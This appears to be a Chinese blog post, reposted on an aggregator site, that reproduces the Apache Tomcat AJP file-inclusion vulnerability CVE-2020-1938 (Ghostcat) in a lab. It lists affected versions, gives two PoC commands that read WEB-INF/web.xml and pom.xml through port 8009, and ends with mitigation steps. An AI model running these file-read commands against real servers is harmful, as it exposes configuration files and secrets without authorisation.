首页 > Web开发 > 详细

Apache-Tomcat CVE-2020-1938

时间:2021-04-19 22:59:59      阅读:19      评论:0      收藏:0      [点我收藏+]

漏洞编号CVE-2020-1938 / CNVD-2020-10487


漏洞成因

Tomcat-AJP的文件包含

影响版本

  Apache Tomcat 6
  Apache Tomcat 7 < 7.0.100
  Apache Tomcat 8 < 8.5.51
  Apache Tomcat 9 < 9.0.31

复现

  • 下载tomcat漏洞版本:
    http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.50/bin/
    开启了8080 和8009端口
    8009用于AJP协议的HTTP连接端口

  • python2版本运行poc:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
    通过命令行查看其他文件:WEB-INF/xxxx
    python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.69.113 -p 8009 -f WEB-INF/web.xml
    技术分享图片

  • web项目要部署在webapps/ROOT目录下
    python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.69.113 -p 8009 -f okr/pom.xml
    技术分享图片

原理分析

后续填补

修复建议

临时修改方案:

  • 临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connector port="8009" protocol="AJP/1.3"redirectPort="8443" />
  • 配置ajp配置中的secretRequired跟secret属性来限制认证
  • 安装安全版本

Apache-Tomcat CVE-2020-1938

原文:https://www.cnblogs.com/fightingcode/p/14678338.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!